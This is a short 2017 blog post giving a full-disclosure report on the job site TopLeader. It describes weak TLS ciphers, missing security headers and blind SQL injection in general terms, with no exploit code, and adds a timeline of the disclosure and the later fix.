Friday, July 07, 2017

[Full Disclosure] TopLeader Is Vulnerable To SQL Injection

Recently, a new local TV advertisement catches my eyes. It is a job hunting website, namely TopLeader.

As an Information Security guy, I am curious to see how secure the website is. I, therefore, conduct a very quick and simple test on it. It is just a recon procedure. I did not hack it.

The site stores employers, customers and agencies information, however, the site is not in HTTPS by default. Meanwhile, the TLS/SSL encryption has weak cipher suites, such as TLS_RSA_WITH_3DES_EDE_CBC_SHA, TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA and TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA.

Although the site has Cross Site Scripting (XSS) security headers protection but it do not have any other security headers other than this. Therefore, the site may have a chance to be attacked by Man-In-The-Middle attack (MITM).

In addition, many urls of the site are vulnerable to Blind SQL injection (SQLi) which has a risk that the data will be leaked to the public by attackers when under attacks.

The webmaster or official is informed about the captioned findings via the website "Contact Us" on June 30, 2017. However, I did not get any reply from the official after 7 days. I decided to public disclosure in order to warn other employers and customers not to trust this site as it has information leakage.

Disclosure Timeline

2017-06-30 - A message is sent to the webmaster or official for the captioned findings via the website.
2017-07-07 - Not receiving any reply from the webmaster or official, then public disclosure.
2017-07-12 - SQL Injection is fixed but the other not yet fixed. The information that keeping before 2017-7-12 may be already leaked to the public.

That's all! See you.